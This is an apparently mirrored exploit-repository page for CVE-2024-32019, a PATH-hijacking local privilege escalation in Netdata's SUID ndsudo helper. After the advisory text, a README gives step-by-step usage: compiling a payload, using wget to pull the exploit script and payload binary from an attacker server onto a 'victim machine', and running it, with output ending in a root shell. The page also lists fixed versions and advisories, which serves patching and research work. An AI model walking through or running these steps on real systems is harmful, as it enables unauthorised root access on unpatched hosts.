CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source

https://github.com/T1erno/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

Associated Vulnerability

Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Description

Netdata ndsudo Privilege Escalation PoC

Readme

# CVE-2024-32019 Netdata ndsudo Privilege Escalation PoC

## Summary

CVE-2024-32019 is a local privilege-escalation flaw in Netdata’s SUID helper ndsudo that lets a local user execute arbitrary programs as root via an untrusted search path (PATH hijacking). 

The issue exists because ndsudo restricts command names but resolves them using the caller’s PATH, allowing a user to place a malicious binary earlier in PATH and have ndsudo run it with root privileges. 

It affects Netdata Agent versions ≥ v1.45.0 and < v1.45.3, and ≥ v1.44.0-60 and < v1.45.0-169, and carries a CVSS v3.1 score of 8.8 (High). 

Mitigation is to upgrade to v1.45.3 or v1.45.0-169; the weakness maps to CWE-426 (Untrusted Search Path). 

## Usage
1. Compile payload or craft your one
```
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
```

2. Upload script and payload to victim machine 
```
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01--  http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’

CVE-2024-32019.sh                                    100%[==================================================>]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 813.04K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
```
3. Execute PoC
```
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

```

#### Sources:
- https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
- https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

File Snapshot


 [4.0K]  /data/pocs/8ea0892dbbeb787439a79500b3263018289650dd
├── [ 712]  CVE-2024-32019.sh
├── [ 157]  payload.c
└── [2.3K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!